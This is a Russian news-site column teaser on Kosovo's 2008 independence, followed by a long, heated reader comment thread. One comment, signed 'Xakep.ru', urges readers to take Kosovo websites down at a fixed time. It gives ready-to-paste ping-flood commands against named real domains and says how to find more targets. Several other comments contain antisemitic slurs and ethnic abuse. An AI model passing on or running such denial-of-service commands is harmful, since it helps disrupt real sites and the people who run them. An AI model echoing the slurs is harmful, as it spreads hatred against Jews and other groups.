статья Огнеопасный фейерверк

Илья Мильштейн, 18.02.2008
Илья Мильштейн

Илья Мильштейн

В Приштине народные гуляния и фейерверки, но это странный праздник. Наблюдая его, меньше всего думаешь про Косово, про сербов и албанцев. Напротив, неустанно размышляешь о нашей Родине - СССР. То есть где рванет - в Абхазии, в Карабахе, в Приднестровье? Или обойдется?


Комментарии
Читатель 18.02.2008 18:21 (#)

Мда...

В огороде бузина, а в Приштине Мильштейн.

Тож читатель 18.02.2008 18:43 (#)

НА КАВКАЗЕ БУЗИНА, А В КРЕМЛЕ ПОЛИТ-БЛЯДИ!

Да что вы? - а я понял по другому - НА КАВКАЗЕ БУЗИНА, А В КРЕМЛЕ ПОЛИТ-БЛЯДИ!

DROMOS MUSAGET(изобретатель фиолетового пороха) 18.02.2008 21:20 (#)

Спа и сапа - разные явления жизни.

Сапа - сиречь подкоп , под муру крепостную копаемый дабы порховой картуз уложить. Бонба же-сосуд метательный. Штатские штафирки путают.

User granennyi, 19.02.2008 00:50 (#)

ЭТО ГОВОРИТ О ТОМ,

... что национальная проблема - вечная проблема. Это еще старый сапер Водичка Швейку говорил: "Плохо ты этих мадьяров знаешь!" А если серьезно, то: "... Демографический сбой происходит тогда, когда на каждых 100 мужчин в возрасте 40 - 44 лет приходится меньше, чем 80 мальчиков в возрасте от 0 до 4 лет. В Германии это соотношение равно 100/50, а в секторе Газы - 100/464. ... Германия и Япония демографически готовы к сдаче странам, подобным мусульманским, - Афганистану (100 мужчин/403 мальчика), Ираку (100 мужчин/351 мальчика) и Сомали (100 мужчин/364 мальчика). Насилие имеет тенденцию происходить в тех обществах, где юноши от 15 до 29 лет составляют больше 30 % от общего населения. Причины - религия, национализм, марксизм, фашизм, т. е. во имя чего вершится это насилие, - несущественны. Сейчас в мире существует 67 стран с демографическим приоритетом молодежи, в 60 из них уже происходит либо массовый геноцид, либо гражданская война..."

User granennyi, 19.02.2008 01:20 (#)

В ТЕМУ:

"Наибольшее же внимание привлекло заявление, с которым выступил глава Сербской православной церкви в Косово епископ Артемий. В интервью газете Glas Javnosti, опубликованном вчера, епископ Артемий сказал, что Сербия должна мобилизовать свои вооруженные силы, объявить Косово оккупированной территорией и закупить у России оружие для ее освобождения. "Заявление главы вооруженных сил генерала Здравко Поноса о том, что армия не будет защищать Косово, является позором, - считает епископ. - Сербия должна закупить современное оружие у России и других стран и попросить Россию отправить добровольцев и организовать военное присутствие в Сербии". Генерал ЗДРАВКО ПОНОС - ну очень круто... Наши Табуреткин и Балуевский просто отдыхают.

(написано анонимно) 19.02.2008 13:42 (#)

"Генерал ЗДРАВКО ПОНОС - ну очень круто... Наши Табуреткин и Балуевский просто отдыхают." В сербохорватском языке слово ПОНОС (с ударением на первый слог) означает ГОРДОСТЬ. Хихикать над неблагозвучием фамилий - признак малолетства.

Xakep.ru 19.02.2008 16:04 (#)

•°•°•°•°•°•°•°•°•°•°•°•°•°•ВНИМАНИЕ! ГРАЖДАНСКАЯ АКЦИЯ!°•°•°•°•°•°•°•°•°•°•°•°•°•°       Просьба разослать во все форумы, все группы и отделы это сообщение      Вешаем косовские сайты:1 атака:19 февраля-22:00 (По Москве)      Призываю всех присутствующих здесь ИТ-специалистов, хакеров и других неравнодушных людей ОТПРАВИТЬ КОСОВСКИЕ ПРЕДСТАВИТЕЛЬСТВА В ИНТЕРНЕТЕ В ПОЖИЗНЕННЫЙ DDoS!
Мы сделали это с Эстонией, мы сделаем это с албаньем! КОСОВО - СЕРБИЯ!ping -n 5000 -l 1000 www.kosova.com -tping -n 5000 -l 1000 www.assembly-kosova.org -tping -n 5000 -l 1000 www.kosovapress.com -tping -n 5000 -l 1000 www.rtklive.com -tping -n 5000 -l 1000 www.kosovalive.com -tping -n 5000 -l 1000 www.kosovayellowpages.com -tping -n 5000 -l 1000 www.alb-net.com -tping -n 5000 -l 1000 www.kosova.de -t      Чтобы найти еще сайты и отличить их от сербских, набирайте в гугле KOSOVA через A, так они пишут.
•°•°Все очень просто, пуск-выполнить-копируете по очереди строчки, начинающиеся с ping. Хватит пустой болтовни, сметем албанцев из интернета!°•°•
Я делаю это за Косово, за Сербию, за Православие, за тысячи замученных душ и десятки разрушенных храмов!

(написано анонимно) 19.02.2008 17:11 (#)

Свою душёнку, Хер. ru , Газ пу продал ?

Sandro 23.02.2008 07:57 (#)

Если за православие, то почему не раздолбать апсно-чеченов?

Успехов тебе!

(написано анонимно) 28.02.2008 19:53 (#)

2008-02-23 04:57:38

грязная же ты тварь !

Pilot Pirks 19.02.2008 01:29 (#)

Граненому

Ув. Граненый, Ваша демографическая статистика очень интересна. Но я не понял, где Вы усматриваете демографический сбой - в Германии или в Афганистане? Что по Вашему предпочтительней: тихое вымирание немцев, или "игра свободных сил" у афганцев? С уважением. Пилот Пиркс.

User granennyi, 19.02.2008 01:58 (#)

ПИЛОТУ ПИРКСУ

Уважаемый Пилот, это не мое - но теперь это кирпичик соего мировоззрения. Это немецкий профессор Гуннар Гейнзон в 2003 опубликовал книгу «Сыновья и мировое господство: роль террора в подъеме и падении наций» (Sohne und Weltmacht: Terror im Aufstieg und Fall der Nationen). Эта книга стала бестселлером во всем мире, но на английский язык до сих пор не переведена. Во вступлении к книге приводится цитата современного немецкого философа, считающего, что эта книга не менее важна и значительна, нежели «Капитал» Карла Маркса. Автор - 63-летний профессор Бременского университета, социолог, экономист и исследователь геноцида. Он написал множество книг о восходе и закате цивилизаций, начиная с Бронзового века, Древней Греции, ближневосточных и буддистских стран и кончая Холокостом и современной Европой. В своей книге «Сыновья и мировое господство» он дает объяснение явлению, породившему непредвиденную и необъяснимую волну терроризма и насилия, которая сокрушает в настоящее время наш мир, назвав это явление «злокачественным демографическим приоритетом молодежи» («Youth Bulge»). А насчет сбоя - это сбой в Германии. Да и в Афганистане - тоже сбой, только в другую сторону. Для примера: в диабете есть две комы - гипогликемическая (мало сахара в крови) и гипергликемическая (много сахара). Обе комы смертельны.

DROMOS MUSAGET 19.02.2008 04:30 (#)

Война - дело молодых?

Население Японии на 97% состоит из японцев. Чужие там не ходят. Херра Хуннара постараюсь прочесть, но статистика по Палестине соответствует подобному соотношению в Германии и России начала 20-го века. Иметь много детей обоего пола - свойство всякого традиционного общества с преобладающим сельским населением. Избыток молодых самцов сам по себе ещё не ведет к внешней экспансии и агрессии. Вариантов "утилизации и канализации" - масса.

Neophyte 19.02.2008 14:27 (#)

Альтернатива

А вот в Китае избыток молодых самцов перевалил за 20 миллионов. Традиционное предпочтение деток мужеского полу сочеталась с жестко проводимой политикой 1 ребенка на семью... вот и повывели девочек. Чем это кончится, по-вашему: запишут весь излишек в гомосеки или агрессивно отправятся на поиски невест за рубеж?

Георгий 19.02.2008 02:26 (#)

А в России какое соотношение? что то цифры не сочетаются с нашим фашизмом.

User granennyi, 19.02.2008 16:40 (#)

НУ КАКОЙ У НАС ФАШИЗМ?

... вяловялотекущий...

Георгий 19.02.2008 02:54 (#)

Хренов REGNUM пишет, что вся грузинская опозиция против признания Косово, а вот что и правительство против-об этом не гу-гу.Вот это и есть россм\ииские двоиние стандарты.

(написано анонимно) 19.02.2008 10:32 (#)

Имеющий уши...

Вы жертва - призыва не смотреть телевизор. Все уже давно смакуют контркурсы Грузии США.

(написано анонимно) 19.02.2008 10:51 (#)

http://www.vesti.ru/doc.html?id=164172&cid=9

Писатель 18.02.2008 19:10 (#)

Читателю - молчать, антисемитская морда! Мильштейн разбирается во всем1 Так же как Рубинштейн, Вайнштейн и Альбац! Полный...

Сказал, что Кавказ вспыхнет - значит вспыхнет! А не вспыхнет сам - товарищи из Мюнхена помогут!

(написано анонимно) 18.02.2008 19:35 (#)

Никакой помощи, - сами справимся. Ведь это Путин всех убеждал, что полыхнёт пожар - значит полыхнет. Путин своё мужское слово умеет держать. Сказал: никаких переговоров с террористами на Дубровке и в Белане. И пусть звери издеваются над женщинами и детьми сколько хотят - наш президент своё слово держит.

DROMOS MUSAGET(победитель чудовищЪ) 18.02.2008 21:49 (#)

Ребятам о зверятах.

Вы друг зверей?

(написано анонимно) 19.02.2008 14:30 (#)

победитель ю чудовыщЪ

Ребятам о зверятах. Вы друг зверей?=================ТЫ ПРО КАКИХ ЗВЕРЕЙ: ТЕХ, ЧТО СРАВНЯЛИ С ЗЕМЛЕЙ ПОЛУМИЛЛИОННЫЙ КРАСИВЕЙШИЙ ЮЖНЫЙ ГОРОД , И , ПО МЕЛОЧИ,СОЖГЛИ И РАЗДОЛБАЛИ ИЗ ГРАНОТОМЕТОВ И ТАНКОВ ШКОЛУ С РЕБЯТАМИ ? МНЕ ЭТИ ЗВЕРИ НЕ НДРАВЯТСЯ - БОЛЬШЕ ЛЮБЛЮ КРОКОДИЛОВ И ГИЕН!И больше люблю сказки , что они насилуют всех подряд женьщин избранной национальности.3.14

nikiv 19.02.2008 17:02 (#)

3.14., ну, что толку в другую крайность бросаться, война это грязь, которая поганит, и правых и неправых, и благие намерения и паскудные, одинаково. Винить озверевших людей на службе идей – напрасный и бессмысленный труд. У меня десять лет на службе был зверь, прошедшим летом всей семьёй хоронили – тибетская овчарка. Дочки было три года, начала его за голову тормошить, а у него рук нет, взял в пасть её головку и отстранил, оставив клыком метку на память. Да и мне на один день рождения отметку подарил, не любил запах водки, а тут друг, вылезший изо стола, решил со мной и собакой сфотографироваться, ну я за ошейник и к себе, а он возьми и зарычи, упёрся, не поверил я, душа в душу лет шесть уже жили, потянул к себе. Дальше всё произошло за доли секунды, голова его описала круг, и моя рука оказалось у него в пасти, я от неожиданности выпустил ошейник, а он сиганул от греха подальше. Есть метка на ноге и у сына, любившего на нём верхом кататься. Собаки уж нет, а вот наши шрамы, как не странно, любовь к этому зверю хранят. Просто зубы и оружие у зверья очень опасны, осуждать их по человеческим законам бесполезный труд. Тот кто спровоцировал зверьё на агрессию, тот и виновен, именно поэтому я и мои меченные домочадцы не держали зла на пса, а учились его понимать, именно поэтому, клыкастый зверь десять лет был нам преданным другом – земля ему пухом. Кремлёвская нелюдь(путин) и его упыри, ни только не хотят понять почему люди звереют, они всё делают для того, чтобы люди словно звери бросались друг на друга.

(написано анонимно) 18.02.2008 21:15 (#)

Не бзди, гебнюк.

User fargo, 18.02.2008 18:33 (#)

Кому уж говорить о двойных стандартах, так только не нынешней России.

Нынешняя Россия на международной арене -- жалкое и отвратительное зрелище.

DROMOS MUSAGET(разумный,добрый,вечный) 18.02.2008 21:29 (#)

Вы идеалист там, где идеализм противен самой природе. Политика и война никогда не бывают красивыми, они завораживают своим уродством.У слепцов часто происходит вполне искренняя подмена понятий.

(написано анонимно) 19.02.2008 03:03 (#)

Это почему?

(написано анонимно) 19.02.2008 03:35 (#)

Отперделся жидок? Лучше подумай где будет твое ПМЖ, когда пиндосов из ирака вышвырнут.

(написано анонимно) 19.02.2008 16:39 (#)

В школе учился?

ТРИ (!) ошибки в одном предложении - и без того бессмысленном; при чём тут чьё - то ПМЖ и Ирак?!? Если не знаешь родной язык - что тогда знаешь вообще и зачем лезешь на "Грани"? Ради вони?..

Ежик 18.02.2008 18:40 (#)

Я не Вольтер и не стремлюсь

Однако любое мнение и действие имеет право быть.Последствия-другое.Или икону нарисут,или по стене размажут,как козявки по бумаге.Другое дело,кто это использует.Тут,Автор,и правда фейервек.Можно направить ракету в небо и порадоваться празднику.А можно направить в толпу плечистых гомосеков с надписью"ОМОН" на очередном марше кого-нибудь иного.

LHD 18.02.2008 18:40 (#)

А вычищение сербов из Краины хорватам сошло с рук - Запад только радовался этому и помогал хорватам словом и делом.

Здихлik Невмipущiй 18.02.2008 18:54 (#)

------------------------LHD------------------------------------------- -------------

У вас, сударь, явный склероз, вы явно запамятовали, что сербы успели повоевать со всеми бывшими республиками Югославии. Они хотели сотворить великую Сербию на всей территории СФРЮ и ради этой идеи стреляли всех и вся.

LHD 18.02.2008 19:00 (#)

Плохо знаете историю. Хорватия, между прочим, тоже стремилась присоединить к себе часть Герцоговины, населённую хорватами. Албанцы в Македонии взбунтовались - при чём здесь Сербия? Короче, история там была значительно сложнее, чем считают малограмотные политиканы, считающие сербов "генетически злодейским народом" и вешающие на них всё и вся.

(комментарий удалён)
(написано анонимно) 18.02.2008 19:17 (#)

Мне кажется разрешение межнациональных конфликтов не должно проходить в плоскости кто сколько кого поубивал. Критерий должен быть один: не допущение в органы государственной власти тех, кто был причастен к убийствам, это наверняка собьёт революционную и диктаторскую спесь у многих политических лидеров сепаратистов.

Свободный 18.02.2008 20:21 (#)

не допущение в органы государственной власти тех, кто был причастен к убийствам

Ну да что Вы... Вы что, на путю метите ? Так ведь он своими руками ниодного не повесил, незастрелил, незарезал... Разве что черьвячька на кручок нанизал, когда полуголый рыбачил...

(написано анонимно) 18.02.2008 21:47 (#)

Оно, какой вы догадливый. Я правда на самопровозглашённых князьков намекал, ну и путя, впрочем, такой же царёк. Помните, когда он окончательно на трон взобралси – детишек, тогда, невинных, с его подставы в Беслане, зверьё бандитское вместе с штурмовиками отправляли в Рай. Я же говорил в своём постике, не о конкретных убийцах. Грех винить шальные пули спецназа попадающие в детей, когда они сами погибали вытаскивая из под огня спасённых ребятишек. Да и проклятое бандитское зверьё творило то, что и задумал путя - раз ФСБ, занятое борьбой с инакомыслием, не может остановить террор, его остановят дети. И ведь остановили - не просчитался наш нелюдь – вот она конкретная причастность к убийствам - путю бы, если не в турму, то в дурку точно, а он извернулся, да на трон российский взобралси. Теперича и других этой изворотливости поучает – ху ли там – один в поле не воин.

LHD 18.02.2008 22:09 (#)

Вообще-то речь шла про Косово. Посмотрите, кто там у власти. Хашим Тачи и Агим Чеку - бывшие командиры УЧК, у которых на совести тоже немало крови. Третий командир, Рамуш Харадинай, сейчас в Гааге под судом, но он успел побывать премьером. Правда, покойный Ругова, действительно, был мирным писателем...

(написано анонимно) 19.02.2008 01:20 (#)

Вообще-то я влез во взаимные претензии, кто у кого больше убил – это не речь про Косово – месть самый, самый, плохой советчик. И российское НИЗЯ исходит не от памяти убиенных, а от нарушения международного права. Ну прям как вероломное нападение на СССР – «22 июня, ровно в четыре часа, Киев бомбили, нам объявили, что началася война». О гады на нас напали, нарушив соглашение о ненападение, а что до этого фашисты страны захватывали, это не война, а так, предел сфер влияния. Так вот про Косово. То, что вы говорите и надо было выносить на обсуждение. А российское непущать, как раз и позволяет удерживаться у власти экстремистам - в принципе такой расклад путина и устраивает, ему с его стервятниками мир не нужен, как внутри России, так и за её пределами – они в смуте во власть пролезли – смута их опора.

(написано анонимно) 19.02.2008 08:16 (#)

пиздец, ты откуда ёбнулсо?

:) 18.02.2008 19:12 (#)

Албанцы, проживающие на территории оккупированного войсками НАТО сербского края Косово, провозгласили независимость.

Независимость от кого? От сербов, конечно. От кого же еще? Не могут же албанцы провозгласить независимость от НАТО и США.

гаврилыч, олдовый наци 18.02.2008 19:15 (#)

гаврилыч, олдовый наци

Южный Кавказ всегда существовал только как географическое понятие. Кавказ, воплитическом отношении, был только Северный, все остальное - республики Закавказья. Не буду объяснять что к чему и откуда вдруг вместо закавказский появились южно-кавказские республики. Сравнивать Абхазию и Южную Осетию нельзя ни в коем случае. Абхазы живут на своей земле и в СССР входили как Абхазская республика, у южных осетин и косовских албанцев все таки статус гостей. Начало правда было положено, когда со своей земли были согнаны палестинцы.

(написано анонимно) 18.02.2008 19:51 (#)

Гаврилыч, дорогой, может просветишь – если бы палестинцев тогда не согнали, где бы они сейчас работу и жратву искали? Во-на им и стена не помеха – рванули, и словно муравьи за провиантом. У себя то, что, такую же благодать не могут создать? - земли мало?

DROMOS MUSAGET(политический географ) 18.02.2008 21:34 (#)

Закавказье - фронтир со времен Российской империи. Граница минимальной протяженности, оптимум удержания территории.

гаврилыч 18.02.2008 22:27 (#)

гаврилыч

Забыл ты дописать что помощи падлы столько получили за годы интифады, что могли бы экономику на уровень Тайваня поднять и выше. И куда-то все разошлось. Одно слово. палестинцы! Только земля, тем не менее, палестинская и все тут.

(написано анонимно) 19.02.2008 03:41 (#)

Блядь жидовская, тебя бы в блокаде держать годами, еще бы не так рванул.

(написано анонимно) 19.02.2008 13:00 (#)

А вот тут ты, блядь-кремлёвская, просчитался, я, если и блядь, то российская – вот стучу пока дают, а прижмут, прогнусь, семью надо кормить, гордостью сыт не будешь. Мне ли, бы бывшему совку, за железным занавесом, не знать, что такое блокада и как враги, с жиру бесясь, не давали нам по человечески жить. А открыли занавес, бля, так враги в кремлю сидели бабло партии пилили, которым, по причине единства с народом, кремлёвская мафия (ЦК КПСС) ведала, а за кордоном оказалось, капитализм прогрессировал, благосостояние личности улучшал без всякого политического единства. От такой правды у многих крыша поехала, кто как и палестинцы, рванул на земли, чужим трудом возделанные, кто скоренько на своей, капитализмики начал, а мы то большинство совков, привыкшие к поводырям, в болото зашли. Спас путин, на единстве вновь к кремлёвской мафии российское бабло отписавший, врагов указавший, - и вышли мы на сушу. Оглянулись, бля, родной Совок, стойло лишь рыночное – мычишь «за» тебя может и накормят, нет, ну так на нет и спроса нет – чем не рынок, когда выбор есть, ведь раньше за «нет» на бойню отправляли. Ху ли там – стадная политика – во-на сербское стадо, как дружно пошло на штурм дипмиссий – враз видна родная кровь, помните как также наше стадо громило витрины в Литве – варвары по другому не могут доказывать свою правоту, потому и в стадо собираются – Ну а кремль впереди планеты всей по скотоводству в политике, и ООН не прочь поскотоводить – риски небольшие, ответственность нулевая, зато баблопил стабильный.

Krasni 18.02.2008 23:01 (#)

gawrilich,oldowii nazi.-Kogda i otkuda pojawilas juzhaja osetija ?.

Мы 18.02.2008 19:21 (#)

Второй раз меня разочарывают на гранях авторы. Первый раз когда был наезд на Гайдара. А сейчас придурок (по другому сказать не могу !) Мильштейн пересказывает враки и бред американов. Это при том, что легко найти в сети неопровергнутую никем защитительную речь Милошевича, в которой подробно разбирается кто и как устроил то, что потом представляли геноцидом от сербов.... А главный идиотизм постулата автора, что Махтисаари сказал верную фразу. Aфффтар, к твоему сведению когда Черномырдин и эта финская сука Махтисаари прилеатли к Милошевичу на тему прекращения бомбардировок Махтисаари сказал прямым текстом что бомбардировки будут усиливаться и нато сровняет с землей Белград если те не уступят. И теперь слова вот этой финской сволоты цитировать ???? Всем давно все ясно а вот когда пишут такие статьи то начинаешь верить в том что наши оппозицию спонсируют оттуда. Милейший Мильштейн, понимаю что пайку хочется но не позорьте ради бога реальных оппонентов нашего режима

(написано анонимно) 18.02.2008 19:37 (#)

после слов - бред американов,перестал читать. Мудать - каких много!

Мы 18.02.2008 22:52 (#)

Ты о себе, болезный ? Больше одного предложения прочесть не можешь ?

(написано анонимно) 19.02.2008 00:07 (#)

Это о Вас, Сэр (или Сэры?)

Человек, выбирающий себе ник "мы", не имеет права рассчитывать на уважение. Его можно доить. Его дОлжно стричь. Это про таких презрительно говорят "быдло".

Мы 19.02.2008 05:55 (#)

Ой-ой-ой . Хорошее слово мы не угодило ? Быдло это состояние вот таких как Вы анонимов. Любой ник - это идентификация ЛИЧНОСТИ. Попробуйте понять это прежде чем писать что-то, особенно не по теме обсуждения

(написано анонимно) 18.02.2008 19:38 (#)

Не люблю официальные каналы

Но все же .Посмотрите вчерашнюю "Империю добра".Это не истина,но близко к ней

(написано анонимно) 18.02.2008 20:11 (#)

Я смотрел вчера "Империю добра", но в общем ничего нового не узнал, только некоторые второстепенные детали. К сожалению, на безумно влюбленных в Америку это не повлияет. Они веруют в США. Это как патология. Это и есть патология.

(написано анонимно) 19.02.2008 03:45 (#)

Второй раз меня разочарывают на гранях авторы.------------------------------------------------------Послушай, уважаемый, "мы"!!! Прости за правду, но не мог ли бы ты выражаться менее загогулисто? Ведь понять тебя нет никакой возможности. Я бы и поаплодировал тебе, да не могу. Сила в твоих словах есть, только ты эти слова правильно расставить не можешь. Вот и получается, что патетики много, а смысла не понять.

Neophyte 19.02.2008 14:43 (#)

Мильштейн написал бузу

"Мы", я с вами целиком согласен. Кроме защитной речи Милошевича есть еще голландский документальный филм, жутко ненавидимый всей политически корректной сволотой мира: там не только так называемый геноцид косовских албанцев и боснийских мусульман разоблачается как фальшивка политических активистов из СМИ, но и само гаагское судилище над Милошевичем (Kangaroo Court). Так что г-н Мильштейн написал бузу... ничего хорошего от появления еще одного мусульманско-наркотрафикантско-сутенерского государства в Европе ни для кого не последует.

User pofigist, 18.02.2008 19:47 (#)

Чувствуется команда!

Не прошло и дня - как ГРани уже пестрят статейками! Мильштейн, Портников... Сейчас еще ВИН подгребет - и будет полный пантеон. И статьи такие все аккуратненькие.. Вроде как и косовары - не очень хорошие, но заслужили...даааа... заслужили... А сербов убивали - да.. убивали.. но чтож теперь поделаешь... война-с... И совсем Косово и не прецедент.. что вы, как можно!!... это же уникальный случай...
Противно! И противнее всего - то насколько эта кампания скоординирована.

(написано анонимно) 18.02.2008 19:49 (#)

Можно подумать, что в этнических или религиозных конфликтах бывает виновата лишь одна сторона. И лишь одна сторона совершает насилие над другой. Крови и насилия, порой не поддающееся человеческому восприятию, хватало с обеих сторон, при чем в равной степени. Не надо рассказывать сказки о бедных албанцах и жестоких сербах,впрочем как и наоборот. Просто дело в военных базах США на терретории Косова, уж больно хорошо расположены. Какое, к черту международное право, когда рядом такой лакомый кусочек! Америка и НАТО самые сильные в военноэкономическом плане и воевать с ними себе дороже. От сюда вывод: хочешь остаться суверенным государством - доведи свой экономический и военный потенциал на нужный уровень. Перестараешься в военную сторону, надорвешься экономически, не дооценишь военный - проголотят и запинают, как Сербию. Найдем ли мы эту золотую середину, не знаю? Не найдем, конец России. Будут править "мильштейны"( Я не имею ввиду национальность) под чутким руководством...

(написано анонимно) 18.02.2008 20:08 (#)

Дорогой, а кто эту «золотую середину» ищет» Вы никак демократ со своим «мы»? Так загляните на другой ветку, там медведевский тезис завис: Россией управляет президент. То бишь конец России у кремлю. Ну может после 2 марта два конца появятся, как и положено у палки, так она не для поиска середины предназначена, тем более - золотой.

(написано анонимно) 18.02.2008 21:29 (#)

Мы - это граждане России. Это те кто облизал все, что можно у Америки и Запада (К счастью таких не много), те кто облизал все у власти (таких к сожалению хватает), те кто рвется вперед к коммунизму(их еще много), те кто голосует за маргинала Жириновского, те кто готов отдать власть Мише 2% или нацболу Лимонову. Ну и те кто ищет и, к огромному сожалению не находит, те политические силы которые будут действовать в интересах граждан России и Росси как государства. Все это МЫ. Мы такие разные и не очень порой симпатичные. Я не верю во всемирный заговор против Росси, но в то же время уверен, если возникнет ситуация, при которой Западу будет выгодно подмять под себя Россию, то его не остановят ни какие международные нормы. Его останавливают только неприемлимые потери. Нет запад и Америка вовсе не являются воплощением зла или дьявола. Просто необходимо помнить, что свои интересы он ставит превыше всего. Ему плевать на международные нормы и договоры. Сила решает все. А вот фразу "То бишь конец России у кремлю." я не понял!

(написано анонимно) 18.02.2008 21:49 (#)

+1

(написано анонимно) 19.02.2008 02:21 (#)

+1, вы тоже не поняли про конец России у кремлю? Напомню. Окрестили как-то путина фаллостическим символом, не поверили (пусть по вашему) мы, к суду привлекли за дезу. А вот нынче Медведев нас обрадовал, зря мы дескать сумневались, демография выправляется. Вот такой конец России у кремлю обосновался и все и вся на этом конце завязаны и мы в том числе. Но нашему голому королю мало он весь мир на конце хочет крутить, а это уже, проверенно Сталиным и Гитлером, конец стране – то бишь конец России у кремлю.

(написано анонимно) 19.02.2008 02:36 (#)

Глубокая мысль, ни чего не скажешь. А каков кругозор, каков стиль изложения, простите за вольность, мыслей. Что то сегодня "демократы" совсем ниже плинтуса опустились.

(написано анонимно) 19.02.2008 13:16 (#)

Да ничего, я не обидчивый. Тиль где вы у плинтуса «демократов» увидели? У нашем дому всё выметено, одни сувениры от «демократов» остались. Может под пол чё завалилось, так это ж только после мартовской клоунады и узнаем, сейчас массовка кругом топчется.

karelija 18.02.2008 23:30 (#)

anonimu 18:29:15.....Kto eti mi,wizhe nenawideti kto ne russki,sa iskljuchenie osetin i to sato chto oni wam lizhut i potihonku trawet was, swoei wodkoi.1992 godu grazhdan rossie inguschski nazionalnosti, wischwernuli iz osetie russkimi tankami,kowo dawili ,kowo rastreliwali i chii interesi rossija saschischala.Nu da Inguschi banditi a russkie i osetini angelochki.Sapomniti otwetite pered mezhdunarodnim sudom sa wse sa Cherkesow,Balkarzow,Karachaewzew,Inguschei.Chechenzow,Dagestan i dalscha.

(написано анонимно) 19.02.2008 00:18 (#)

А еще прибалтов, скандинавов, поляков, американцев, украинцев, грузин, армян, турок, евреев, и далее, далее, далее...Не хочу отвечать на эту чушь! По моему все гораздо проще, ты обыкновенный руссофоб, коих на гранях и среди "демократов" к сожалению не мало! С фанатиками спорить смысла нет!

(написано анонимно) 19.02.2008 03:58 (#)

Ответ анониму 2008-02-18 18:29:15

Нет запад и Америка вовсе не являются воплощением зла или дьявола. Просто необходимо помнить, что свои интересы он ставит превыше всего. Ему плевать на международные нормы и договоры. Сила решает все. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Ну, а ты считаешь, что кто-то свои интересы не ставит выше всего? Приведи примеры. А что наша российская власть не ставит выше всего свои интересы? Ты ищешь какие-то мифические силы, которые "будут действовать в интересах граждан России и России как государства". Ну ты И идеалист высшей пробы. Сам же до этого написал, что одни готовы голосовать за Жириновского, другие - за Мишу 2%, третьи- за маргинала Лимонова. А ведь все эти люди тоже граждане РОССИИ.

Георгий 18.02.2008 20:06 (#)

Неправда

"Получается, беда абхазов или армян в Карабахе заключается в том, что Америка не спасала их от этнических чисток. Они сами себя спасли. Иногда при помощи России. Но тут сюжет завязывается в такой клубок, что голова кругом." - неправда они НЕ САМИ

(написано анонимно) 28.02.2008 20:00 (#)

Георгию

Представьте себе , что Сами со своими братскими народами , которые абхазам на помощь пришли и ВАМ ДОЛОЕБУ ЭТОГО НИКОГДА НЕ ПОНЯТЬ !

Мирослав 18.02.2008 21:30 (#)

Хочу напомнить вам, уважаемые господа: Хорватия в 1995 г. осуществила масштабную этническую чистку в Сербской Краине в ходе операций "Вспышка" и "Гром", убив несколько тысяч и изгнав более 200 тысяч сербов с земли, на которой они жили испокон веков, а отнюдь не были пришельцами. Возможно, кто-то осудил Хорватию? Ничего подобного - об этом ДАЖЕ НЕ СООБЩАЛОСЬ, как будто этого и вовсе не было. Можно ли найти более яркий пример лицемерия?

DROMOS MUSAGET( кинокритик политики) 18.02.2008 21:56 (#)

Устами кровавого младенца.

Сербы - плохии парни. Их надо убивать мучительно и зрелищно. Албаны - хорошие. Спонсор кинофильма так хочет. В другой серии их могут поменять ролями, если плохо будет наполняться касса. Дебильно? Противно? Работает и пополняет офис-бокс - вот критерий истины!

Мирослав 18.02.2008 22:16 (#)

Приношу свои извинения за фактическую ошибку: конечно же речь идет об операциях "Вспышка" ("Bljesak"), май 1995, и "Буря" (Olyja), август того же года.

(написано анонимно) 18.02.2008 21:30 (#)

Косово действительно уникальный случай... по своему цинизму

Косово действительно уникальный случай... по своему цинизму со стороны антлантического блока. Россия, действительно независимая страна, спобная навести орядок в любой СВОЕЙ кавказской провинции и никто не решиться бомбить Москву. ВОТ ЧТО ТАКОЕ СУВЕРЕНИТЕТ. Все остальное купля-продажа. Но когда исламисты будут резать в Европе своих ГЛАВНЫХ ВРАГОВ (нужное вписать), помощь с Востока не придет.

(написано анонимно) 18.02.2008 21:40 (#)

Все у нас наладится, все будет хорошо. Татарстан, Башкирия, ненцы, ханты, манси, якуты, Средне-Уральская, Дальневосточная Республики тоже настрадались от кремлевско-российского террора и геноцида. Они следующие на очреди на признание их суверенными государствами. Вот хохма будет, когда от Садового кольца отвалятся все нефте-газоносные регионы

DROMOS MUSAGET(разумный,добрый,вечный) 18.02.2008 22:02 (#)

Порулил, насосался,иди растить апелцын!

Привет палестинцам ! Сочуствуют бЭдолаги всем угнетенным, сеют доброе.

Pilot Pirks 18.02.2008 23:32 (#)

Анониму 18:30:56

"Россия, действительно независимая страна, спобная навести орядок в любой СВОЕЙ кавказской провинции и никто не решиться бомбить Москву." Когда-то (до Первой мировой), такой порядок способны были навести в своих провинциях и колониях все великие державы. Они признавали друг за другом право наводить этот порядок с применением любого количества пулеметов. Однако за сование своего носа в чужие колонии, они готовы были воевать между собой "до упора". Сейчас времена изменились - "великие державы" (вернее их правительства, прогибающиеся перед "демократической" толпой) как огня боятся междуусобных конфликтов (правда, надо признать, что боятся есть чего) и, как результат, проморгали, как бывшие колонии распоясались и обнаглели до уровня бывших колониалистов. Отсюда вывод: осуждая колониализм, нельзя потакать и "рабу с колен встающему", ибо, как говорили римляне: "раб он только под плеткой человек, а без плетки он - скотина".

(комментарий удалён)
(написано анонимно) 18.02.2008 22:08 (#)

Или ракеты...

(написано анонимно) 19.02.2008 04:08 (#)

ОТВЕТ 2008-02-18 18:50:36

Гарантия целостности и суверенитета России (т. е. гарантия того что завтра в Брюсселе или в Вашингтоне не будет принято решение об отделении, например, Смоленской области от Российской Федерации и натовские солдаты не встанут на границе, проведенной западными политиками между Смоленской областью и остальной Россией, реализуя это решение) - это русский солдат, вооруженный русским оружием.++++++++++++++++++++++++++++++ ДУРАК ТЫ АНОНИМ. ТЫ БЫ ЛУЧШЕ ПОЖЕЛАЛ РОСИИ НЕ СОЛДАТА СВОЕГО ПОСТАВИТЬ ГДЕ-ТО НА ГРАНИЦЕ СМОЛЕНСКОЙ ОБЛАСТИ, А ПРЕЗИДЕНТА НОРМАЛЬНОГО СВОБОДНО ИЗБРАТЬ. А ТО ВЕДЬ ТАК И ОСТАНЕМСЯ РАБАМИ, КОТОРЫЕ ОДОБРЯЮТ НАСЛЕДНИКА МОНАРХА.

(написано анонимно) 18.02.2008 22:08 (#)

